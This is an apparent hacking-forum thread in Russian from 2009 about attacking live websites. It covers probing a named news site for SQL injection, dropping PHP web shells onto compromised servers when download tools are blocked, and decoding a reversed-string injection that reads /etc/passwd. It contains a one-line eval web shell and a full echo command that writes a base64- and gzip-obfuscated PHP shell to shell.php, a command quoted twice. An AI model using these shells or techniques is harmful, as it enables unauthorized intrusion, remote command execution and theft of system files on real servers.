
29.07.2009, 02:56
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Код:
http://censor.net.ua/go/offer/ResourceID/12235-4.html
http://censor.net.ua/go/offer/ResourceID/12231.html
совпадают, то есть вроде как признак sql инъекции. Но более ничего не подтверждает это. Возможно ли тут запроса внедрение?
|
|
|

29.07.2009, 04:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0
|
|
|

29.07.2009, 06:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
|
|
|

29.07.2009, 09:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Tigger
Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0
я так понял что ты залил '<?php eval($_GET[cmd]);?>' да? елси это так то пробуй залить локальный аплоад =)
|
|
|

29.07.2009, 11:48
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами:
9989667
Репутация:
240
|
|
Сообщение от Tigger
Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0
Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда:
Код:
echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZRkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6vooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnAC4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9fAymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80ySsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsReT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLKPazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQAfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51FhRagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUri0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZvPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bicEE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTdKWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1yun1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96SwbYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1OtFiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOnLWeX7VA718="))); ?>' > shell.php
согласен с постом выше, всегда так делал, всегда прокатывало.
|
|
|

29.07.2009, 11:58
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
Сообщение от The_HuliGun
Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда:
Код:
echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZRkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6vooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnAC4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9fAymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80ySsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsReT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLKPazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQAfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51FhRagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUri0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZvPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bicEE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTdKWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1yun1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96SwbYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1OtFiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOnLWeX7VA718="))); ?>' > shell.php
согласен с постом выше, всегда так делал, всегда прокатывало.
но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...
|
|
|

29.07.2009, 12:03
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами:
9989667
Репутация:
240
|
|
Сообщение от nemaniak
но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...
Размер етого шелла- 3.8кб, ради интереса посмотрел, криптованый-1.9КБ, если что-то может помешать то ето Warning: gzinflate(), но ето бывает 2:10
Есть испольнения комманд и аплоадер файлов.
Последний раз редактировалось The_HuliGun; 29.07.2009 в 12:08..
|
|
|

29.07.2009, 09:26
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами:
8886744
Репутация:
-67
|
|
Вот взял чужую пхп инъекцию http://forum.antichat.ru/showpost.php?p=1414940&postcount=940
Обясните мне плиз. я не понял каким он образом сформировал /etc/passwd
в этот бред.
Код:
/cte/=htap_elif;dwssap=eman_elif
Мне надо понять, плиз.
ЗЫ. с меня +++
|
|
|

29.07.2009, 10:02
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
/cte/=htap_elif;dwssap=eman_elif
/cte/ это /etc/ задом на перед
=htap_elif; просто чтобы было
dwssap это passwd наоборот
eman_elif чтобы было
другими словами
/cte/=htap_elif;dwssap=eman_elif это file_name=passwd;file_path=/etc/ только задом на перед
__________________
Карфаген должен быть разрушен...
|
|
|

29.07.2009, 10:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
HAXTA4OK, как мне его залить? о_0 Все функции заливки запрещены. Удаленный инклюд не пашет.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|